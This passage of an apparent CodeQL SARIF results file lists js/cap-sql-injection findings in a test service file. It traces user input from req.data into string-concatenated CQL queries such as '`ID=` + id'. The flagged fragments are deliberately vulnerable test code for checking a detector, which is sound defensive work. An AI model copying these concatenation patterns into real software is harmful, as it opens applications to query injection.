value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":653,"startColumn":18,"endColumn":23}}}],"partialFingerprints":{"primaryLocationLineHash":"e6651c34faab8e22:1","primaryLocationStartColumnFingerprint":"11"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":651,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":651,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":651,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":652,"startColumn":56,"endColumn":58}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":652,"startColumn":48,"endColumn":58}},"message":{"text":"`ID=` + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":652,"startColumn":21,"endColumn":59}},"message":{"text":"SELECT. ... ` + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":652,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":653,"startColumn":18,"endColumn":23}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":651,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":651,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":659,"startColumn":18,"endColumn":23}}}],"partialFingerprints":{"primaryLocationLineHash":"35109df28cbbc5c:1","primaryLocationStartColumnFingerprint":"11"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":657,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":657,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":657,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":658,"startColumn":54,"endColumn":56}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":658,"startColumn":48,"endColumn":58}},"message":{"text":"`ID=${id}`"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":658,"startColumn":21,"endColumn":59}},"message":{"text":"SELECT. ... ${id}`)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":658,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":659,"startColumn":18,"endColumn":23}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":657,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":657,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":670,"startColumn":7,"endColumn":48}}}],"partialFingerprints":{"primaryLocationLineHash":"efbe9cdee9ed72b8:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":669,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":669,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":669,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":670,"startColumn":45,"endColumn":47}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":670,"startColumn":36,"endColumn":47}},"message":{"text":"\"ID =\" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":669,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":669,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":670,"startColumn":36,"endColumn":47}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":675,"startColumn":7,"endColumn":48}}}],"partialFingerprints":{"primaryLocationLineHash":"3a884df2f960d319:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":674,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":674,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":674,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":675,"startColumn":45,"endColumn":47}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":675,"startColumn":36,"endColumn":47}},"message":{"text":"`ID =` + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":674,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":674,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":675,"startColumn":36,"endColumn":47}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":680,"startColumn":7,"endColumn":47}}}],"partialFingerprints":{"primaryLocationLineHash":"693c1ad544283ec3:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":679,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":679,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":679,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":680,"startColumn":42,"endColumn":44}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":680,"startColumn":36,"endColumn":46}},"message":{"text":"`ID=${id}`"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":679,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":679,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":680,"startColumn":36,"endColumn":46}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1).\nThis CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":705,"startColumn":7,"endColumn":81}}}],"partialFingerprints":{"primaryLocationLineHash":"737ffeac7015e49f:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":704,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":704,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":704,"startColumn":19,"endColumn":25}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":705,"startColumn":52,"endColumn":58}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":705,"startColumn":36,"endColumn":58}},"message":{"text":"\"col1 = ...  amount"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":704,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":704,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":704,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":705,"startColumn":78,"endColumn":80}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":705,"startColumn":66,"endColumn":80}},"message":{"text":"\"col1 = \" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":704,"startColumn":30,"endColumn":38}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":704,"startColumn":30,"endColumn":38}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":705,"startColumn":36,"endColumn":58}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":705,"startColumn":66,"endColumn":80}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1).\nThis CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":710,"startColumn":7,"endColumn":80}}}],"partialFingerprints":{"primaryLocationLineHash":"68fb2832260c17eb:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":709,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":709,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":709,"startColumn":19,"endColumn":25}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":710,"startColumn":52,"endColumn":58}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":710,"startColumn":36,"endColumn":58}},"message":{"text":"\"col1 = ...  amount"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":709,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":709,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":709,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":710,"startColumn":77,"endColumn":79}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":710,"startColumn":66,"endColumn":79}},"message":{"text":"`col1 =` + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":709,"startColumn":30,"endColumn":38}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":709,"startColumn":30,"endColumn":38}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":710,"startColumn":36,"endColumn":58}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":710,"startColumn":66,"endColumn":79}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1).\nThis CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":715,"startColumn":7,"endColumn":81}}}],"partialFingerprints":{"primaryLocationLineHash":"c05bb3983bd0ec24:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":714,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":714,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":714,"startColumn":19,"endColumn":25}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":715,"startColumn":52,"endColumn":58}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":715,"startColumn":36,"endColumn":58}},"message":{"text":"\"col1 = ...  amount"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":714,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":714,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":714,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":715,"startColumn":76,"endColumn":78}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":715,"startColumn":66,"endColumn":80}},"message":{"text":"`col1 = ${id}`"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":714,"startColumn":30,"endColumn":38}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":714,"startColumn":30,"endColumn":38}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":715,"startColumn":36,"endColumn":58}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":715,"startColumn":66,"endColumn":80}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":720,"startColumn":7,"endColumn":79}}}],"partialFingerprints":{"primaryLocationLineHash":"a5013b756880128f:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":719,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":719,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":719,"startColumn":19,"endColumn":25}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":720,"startColumn":52,"endColumn":58}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":720,"startColumn":36,"endColumn":58}},"message":{"text":"\"col1 = ...  amount"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":719,"startColumn":30,"endColumn":38}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":719,"startColumn":30,"endColumn":38}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":720,"startColumn":36,"endColumn":58}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":755,"startColumn":7,"endColumn":50}}}],"partialFingerprints":{"primaryLocationLineHash":"aa17f3fb0e89ad00:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":754,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":754,"startColumn":13,"endColumn":19}},"message":{"text":"{ id 